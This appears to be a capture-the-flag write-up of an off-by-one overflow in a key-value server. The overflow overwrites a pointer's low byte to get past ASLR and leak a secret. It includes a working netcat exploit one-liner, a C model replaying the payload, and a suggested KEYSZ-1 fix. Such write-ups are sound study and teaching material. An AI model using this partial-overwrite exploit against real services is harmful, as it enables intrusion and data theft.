Analysis of the bug
===================

The `p` command of the `child()` function, while reading the key, doesn't account for the `:` character that has already been put into the `key` buffer: it reads `KEYSZ` bytes into the buffer starting right after the `:`, one more than fits. The last byte of the key is thus written past the end of the buffer and overwrites the least significant byte of the `value` pointer stored next to it.

Attack plan
===========

The idea is to redirect a `value` pointer so that it points to the entry holding the secret key. Writing that entry's value then overwrites its key and removes the leading `:`; afterwards the flag can be read by searching for the overwritten key.

Attack implementation
=====================

We want some `value` pointer to point to `entries[0]`. If `value` and `entries[0]` are sufficiently close, we can create the alias by overwriting a single byte. This also defeats ASLR, since we don't need to know the other bytes of the address: ASLR randomizes at page granularity and therefore cannot change the least significant 12 bits of `entries[0]`, so its LSB can be found by running the binary in a debugger. Brute forcing is also easy: addresses returned by `malloc()` are aligned to 16, so there are only 16 (256/16) possible bytes to test. In our case, the LSB of `entries[0]` is 0x30.

The following attack reveals the flag:

```sh
export PYTHONIOENCODING=iso-8859-1
python3 -c 'print("p8\n"+"A"*7+"\x30"+"B"*8+"s"+"B"*8)' | nc $HOST $PORT
```

First we send the `p` command to trigger the bug, then 7 padding bytes followed by the 0x30 byte, which overwrites the LSB of the `value` field in `entries[1]` and makes it point to `entries[0]`. The 8 `B`s are then read as the value and written through the redirected pointer, so they overwrite the `key` field of `entries[0]` and with it the leading `:`. The final `s` command searches for the key `BBBBBBBB` and prints its value, the flag.

Suggested fix
=============

The `child()` function should pass `KEYSZ-1` to `readn()` when processing the `p` command, since one byte of the key buffer is already taken by the `:`.
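To make the corruption and the fix concrete, here is an added C model of the bug; it is not the challenge binary's code and its layout is reconstructed from the writeup. It assumes `KEYSZ` is 8 (the exploit sends 8 key bytes), that `value` directly follows `key` in each entry, a little-endian target, and a fake heap in which offsets 0x30/0x50/0x70 stand in for consecutive `malloc()` chunks (0x30 being the LSB the page found); the secret key and flag string are constructed. The same payload is replayed against the vulnerable handler and against the `KEYSZ-1` version.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed reconstruction of the binary's entry layout (not given on the page):
 * KEYSZ = 8 matches the 8 key bytes the exploit sends, and `value` directly
 * follows `key`, so a one-byte overrun lands on the pointer's low byte
 * (little-endian assumed). */
#define KEYSZ    8
#define NENTRIES 2

struct entry {
    char  key[KEYSZ];
    char *value;
};

/* Stand-in for the binary's readn(): an in-memory "socket" we read from. */
struct stream { const unsigned char *p; size_t left; };

static void readn(struct stream *s, void *dst, size_t n)
{
    assert(n <= s->left);
    memcpy(dst, s->p, n);
    s->p += n;
    s->left -= n;
}

/* Vulnerable `p` handler: key[0] already holds ':', yet KEYSZ bytes are read
 * into key+1, so the last one is written to key[KEYSZ], i.e. value's LSB. */
static void put_vulnerable(struct entry *e, struct stream *s, size_t vlen)
{
    e->key[0] = ':';
    readn(s, e->key + 1, KEYSZ);      /* BUG: one byte too many */
    readn(s, e->value, vlen);         /* writes wherever value now points */
}

/* Suggested fix: leave room for the ':' by reading KEYSZ-1 bytes. */
static void put_fixed(struct entry *e, struct stream *s, size_t vlen)
{
    e->key[0] = ':';
    readn(s, e->key + 1, KEYSZ - 1);
    readn(s, e->value, vlen);
}

/* `s` handler: returns the value of the first entry whose key matches. */
static const char *find(struct entry **entries, size_t n, const char *key)
{
    for (size_t i = 0; i < n; i++)
        if (memcmp(entries[i]->key, key, KEYSZ) == 0)
            return entries[i]->value;
    return NULL;
}

/* Fake heap: a 256-byte-aligned arena, so the low address byte of every
 * object is known in advance, just as ASLR leaves the low 12 bits of real
 * heap addresses untouched. Offsets 0x30/0x50/0x70 are assumed to mimic
 * three consecutive 16-byte malloc() chunks; 0x30 is the LSB the page found. */
static _Alignas(256) unsigned char arena[256];
#define AT(off) ((void *)(arena + (off)))

/* Replays the page's payload (7 'A', 0x30, then 8 'B') against this model and
 * returns what the final `s BBBBBBBB` lookup yields: the secret value when
 * the vulnerable handler is used, NULL with the fixed one. */
static const char *run_attack(int fixed)
{
    static const char secret[] = "flag{constructed_example}";  /* constructed */
    struct entry *entries[NENTRIES];
    unsigned char payload[KEYSZ + 8];
    struct stream s = { payload, sizeof payload };

    memset(arena, 0, sizeof arena);
    entries[0] = AT(0x30);
    memcpy(entries[0]->key, ":secret", KEYSZ);   /* hidden key, leading ':' */
    entries[0]->value = (char *)secret;
    entries[1] = AT(0x50);
    entries[1]->value = AT(0x70);                /* the "malloc(8)" for value */

    memset(payload, 'A', 7);
    payload[7] = 0x30;                /* lands on entries[1]->value's LSB */
    memset(payload + 8, 'B', 8);      /* value bytes, end up in entries[0]->key */

    if (fixed) put_fixed(entries[1], &s, 8);
    else       put_vulnerable(entries[1], &s, 8);
    return find(entries, NENTRIES, "BBBBBBBB");
}

int main(void)
{
    const char *leaked = run_attack(0);
    printf("vulnerable: %s\n", leaked ? leaked : "(nothing)");
    printf("fixed:      %s\n", run_attack(1) ? "leak" : "(nothing)");
    return 0;
}
```

Against the real binary the arena is the actual heap, so the 0x30 byte has to come from a debugger run or from trying the 16 candidates the `malloc()` alignment leaves; everything else in the chain is the same as in the model.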